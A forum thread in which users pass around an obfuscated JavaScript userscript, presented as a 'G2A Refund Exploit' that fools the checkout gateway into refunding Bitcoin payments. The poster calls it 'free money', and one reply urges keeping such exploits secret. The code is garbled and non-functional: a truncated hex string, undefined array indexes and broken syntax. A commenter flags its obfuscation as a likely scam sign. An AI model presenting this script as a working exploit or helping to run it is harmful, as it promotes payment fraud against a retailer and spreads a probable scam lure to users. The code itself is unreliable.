insane refund exploit dropped

Pirate

Pirate

NEET
Feb 24, 2024
5,106
This looks like a scam, legit?
How would they scam you? It's all on your side

Any IQcels can you read the code so we know it's not a scam

Code:
// ==UserScript==
// @name        G2A Refund Exploit
// @namespace   Bounty
// @version     1.3
// @description G2A refund exploit. This exploit will trick the payment gateway in G2A to get a refund on all BTC payments.
// @author      @VQ_Moe
// @match       https://checkout.pay.g2a.com/*
// @grant       none
// ==/UserScript==

none

var _0x8824 = ["\x75\x73\x65\x20\x73\x74\x72\x69\x63\x74", "\x45\x78\x70\x6C\x6F\x69\x74\x20\x73\x75\x63\x63\x65\x73\x73\x66\x75\x6C\x6C\x"];
var _0x4871x3 = document[_0x8824[0]](_0x8824[1]);
_0x4871x3[1][_0x8824[3]] = _0x8824[4];
document[_0x8824[2]](_0x8824[6])[0][_0x8824[5]] = _0x8824[7];
var _0x4871x4 = document[_0x8824[2]](_0x8824[6]);
if (_0x4871x4[_0x8824[8]] > 0) {
    clearInterval(_0x4892da);
}
, 10);

// Backend-Exploit | Status: Working
// (status auto updates if any changes have been made).
 
クーロ

クーロ

عثمان دان فوديو الثاني
Jan 23, 2024
5,208
Even if it's not a scam now that you shared it publicly they'll patch it out you idiot. You're supposed to keep it to yourself
 
Pirate

Pirate

NEET
Feb 24, 2024
5,106
Even if it's not a scam now that you shared it publicly they'll patch it out you idiot. You're supposed to keep it to yourself
i don't have bitcoin i want somebody else to do it for me
:feelscomfy::feelscomfy:

IT'S LITERALLY FREE MONEY!
 
god.ly

god.ly

‏‏‎ ‏‏‎ ‏‏‎ ‏‏‎ ‏‏‎ ‏‏‎ ‏‏‎ ‏‏‎ ‏‏‎
Oct 12, 2023
2,709
How would they scam you? It's all on your side

Any IQcels can you read the code so we know it's not a scam

Code:
// ==UserScript==
// @name        G2A Refund Exploit
// @namespace   Bounty
// @version     1.3
// @description G2A refund exploit. This exploit will trick the payment gateway in G2A to get a refund on all BTC payments.
// @author      @VQ_Moe
// @match       https://checkout.pay.g2a.com/*
// @grant       none
// ==/UserScript==

none

var _0x8824 = ["\x75\x73\x65\x20\x73\x74\x72\x69\x63\x74", "\x45\x78\x70\x6C\x6F\x69\x74\x20\x73\x75\x63\x63\x65\x73\x73\x66\x75\x6C\x6C\x"];
var _0x4871x3 = document[_0x8824[0]](_0x8824[1]);
_0x4871x3[1][_0x8824[3]] = _0x8824[4];
document[_0x8824[2]](_0x8824[6])[0][_0x8824[5]] = _0x8824[7];
var _0x4871x4 = document[_0x8824[2]](_0x8824[6]);
if (_0x4871x4[_0x8824[8]] > 0) {
    clearInterval(_0x4892da);
}
, 10);

// Backend-Exploit | Status: Working
// (status auto updates if any changes have been made).
Obfuscated code, not a good sign
 
Activity
So far there's no one here

Similar threads

Last.Try
Replies
0
Views
61
Last.Try
Last.Try
Stupid Clown
Replies
2
Views
166
Stupid Clown
Stupid Clown
T
Discussion The Betabux crisis
Replies
6
Views
153
SheikhImranHosein
SheikhImranHosein
GentlemanSupremacy
Replies
6
Views
168
Deleted member 2825
D
Stupid Clown
Replies
4
Views
313
rekamaður
R
Top